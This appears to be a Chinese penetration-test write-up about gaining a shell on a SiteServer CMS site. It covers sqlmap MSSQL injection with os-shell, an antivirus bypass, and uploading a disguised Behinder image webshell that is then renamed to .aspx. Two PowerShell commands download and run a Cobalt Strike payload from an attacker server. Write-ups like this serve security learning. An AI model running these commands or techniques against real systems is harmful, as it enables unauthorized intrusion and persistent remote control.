一次mssql注入+白名單上傳繞過360的示例分析

小編給大家分享一下一次mssql注入+白名單上傳繞過360的示例分析，相信大部分人都還不怎么了解，因此分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后大有收獲，下面讓我們一起去了解一下吧！

信息收集：

站點(diǎn)使用vue+aspx+iis8.5搭建。站點(diǎn)登錄框有版本號(hào)且url欄中存在siteserver字樣，因此懷疑是cms搭建的，但未見過該cms，使用谷歌搜索發(fā)現(xiàn)該站點(diǎn)是用siteserver cms搭建的，版本為最新，且網(wǎng)上提供的漏洞在此無法使用，在登錄框嘗試過注入+弱口令+驗(yàn)證碼繞過+未授權(quán)之類等等手段之后無果，由于具有測(cè)試的賬號(hào)，干脆因此直接登錄站點(diǎn)進(jìn)行測(cè)試。

圖示為我從網(wǎng)上查找的登錄圖片，紅框處當(dāng)時(shí)是版本號(hào)而非cms提示。

功能測(cè)試：

進(jìn)入后臺(tái)之后簡單瀏覽了一下功能，多是一些頁面管理的功能，此處不再贅述，本文主要是從注入點(diǎn)切入。

一：對(duì)上傳點(diǎn)的測(cè)試：多處存在上傳包括頭像，普通doc文件，編輯器上傳，經(jīng)過測(cè)試，上傳功能均使用白名單進(jìn)行限制，于是決定放棄上傳點(diǎn)，畢竟就算能上傳jpg也因?yàn)閕is版本太高無法解析。（但是我后來看到過一個(gè)文章iis8.5竟然用解析漏洞成功了）。

二：在一處“批量整理”功能處，抓包

對(duì)搜索點(diǎn)keyword參數(shù)進(jìn)行sql注入測(cè)試，發(fā)現(xiàn)報(bào)錯(cuò)，于是直接復(fù)制數(shù)據(jù)包丟到sqlmap跑。python sqlmap.py -r 1.txt .

結(jié)果發(fā)現(xiàn)存在堆疊查詢，且dba權(quán)限，直接使用--os-shell命令開啟xp_cmd獲得shell.使用whoami命令發(fā)現(xiàn)當(dāng)前權(quán)限直接是最高權(quán)限NT AUTHORITY\SYSTEM，開心了，除了這些洞以外再加上其他的點(diǎn)本來收拾收拾本次滲透就到此結(jié)束了。

進(jìn)入內(nèi)網(wǎng)：

但是這么高的權(quán)限都到手了，不進(jìn)一下內(nèi)網(wǎng)都說不過去，本來想著很簡單的事情。

打開vps，啟動(dòng)cs，生成powershell馬，os-shell運(yùn)行，等待上線，結(jié)果提示錯(cuò)誤：

powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX ((new-object net.webclient).downloadstring('http://xxx:port/a'))"

第一是先看一下機(jī)器是否可以出網(wǎng)，ping了一下vps和dnslog沒問題的，于是嘗試使用cmd命令執(zhí)行powershell：

cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX ((new-object net.webclient).downloadstring('http://xxx:port/a'))"

發(fā)現(xiàn)還是報(bào)同樣的錯(cuò)，懷疑是引號(hào)的問題，于是百度了一下cmd中引號(hào)轉(zhuǎn)義使用^ ,結(jié)果還是不行。

然后旁邊的大佬說是不是window server 2012 r2 設(shè)置了powershell遠(yuǎn)程下載執(zhí)行策略，于是嘗試使用Get-ExecutionPolicy 查看，并使用Set-ExecutionPolicy 開啟，以下為本機(jī)演示（真實(shí)環(huán)境截圖忘記了）：

具體可參考該文章：https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

最終在真實(shí)環(huán)境成功修改powershell執(zhí)行策略，再去執(zhí)行命令還是不行，這個(gè)時(shí)候突然想到會(huì)不會(huì)是有殺軟在作怪，于是tasklist看了一下，好家伙果然存在360防護(hù)（此處也無截圖）。

猜測(cè)確實(shí)是360起了作用，這個(gè)時(shí)候第一想法就是繞過殺軟，之前沒有太接觸過殺軟之類的工具，http://jackson-t.ca/runtime-exec-payloads.html，直接在這里面編碼了一下powershell 命令，結(jié)果也不能用，要不然再去借個(gè)馬，還要麻煩人家。

這個(gè)時(shí)候突然想到sqlmap寫馬來上傳文件，但是mssql又沒有像mysql一樣函數(shù)（后來問了大佬sqlmap也可以在os-shell的情況下上傳文件（騷操作）），忽然想起來我剛才測(cè)試時(shí)候多處功能點(diǎn)是有文件上傳功能的，雖然是白名單，但是絲毫不影響我丟個(gè)圖片馬上去。說干就干，在頭像上傳處直接上傳冰蝎圖片馬，bingxie.jpg .然后在os-shell里面使用copy命令重命名 copy d:\abc\img\bingxie.jpg d:\abc\img\bingxie.aspx. 然后使用冰蝎連接，毫無疑問直接成功上線，完結(jié)撒花。

以上是“一次mssql注入+白名單上傳繞過360的示例分析”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內(nèi)容對(duì)大家有所幫助，如果還想學(xué)習(xí)更多知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道！